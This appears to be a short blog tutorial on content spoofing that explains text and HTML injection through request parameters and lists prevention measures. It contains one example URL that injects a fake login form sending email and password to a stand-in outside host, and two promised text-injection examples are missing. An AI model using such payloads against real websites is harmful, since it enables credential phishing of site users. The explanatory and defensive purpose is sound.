What is Content Spoofing and how to prevent it

Hello guys,

In this article, we will discuss about what is Content Spoofing, how it will affect your website and business, and how to prevent Content Spoofing.

what is Content Spoofing?

Content Spoofing or Content Injection is one of the common website attack targetting specific user or group of users by vulnerability on web application. It happens when web application is can't handle data supplied by end user. The attacker inject text or HTML content in the website, mostly through parameters. And the supplied data reflects back on the webpage. This type of attack mostly done to affect website SEO or defame businesses by compititors.

Content Spoofing is closely similar to Cross-site Scripting(XSS) except XSS uses javascript code to run script in the webpage while Content Spoofing is about changing webpage content.

There are two type of attacks possible:

1. Text Injection
2. HTML Injection

Text Injection

Text Injection is type of Content Spoofing attack where attacker inject text data in the website and change the content of the website. For example, In some cases attacker might pass data via request parameters and create malicious link of trusted website.

For example, common website have login page, where error message display from query parameters.


Now attacker change this error message like below and send other users to ask login to another website and may get login credentials from users.


HTML Injection

HTML injection is same as text injection but in this type of attack, HTML content is injected in webpage. In the above example, attacker may push HTML code into website and get user login data.  

http://hackedsite/welcome?name=<h1>Welcome, please login to continue</h1><form method="post"
action="http://anothersite/login">EMail: <input type="text" name="email" /><br />Password: <input type="password"
name="password" /><input type="submit" value="Login" /></form>

How to prevent Content Spoofing?

Here are few measures you can take to stop Content Spoofing:

1. Avoid use of displaying messages via request parameters, instead use temporary sessions.
2. Validate the data which are reflecting via request parameter.
3. Avoid passing HTML data through request parameter, if you really need it, use proper encoding before passing.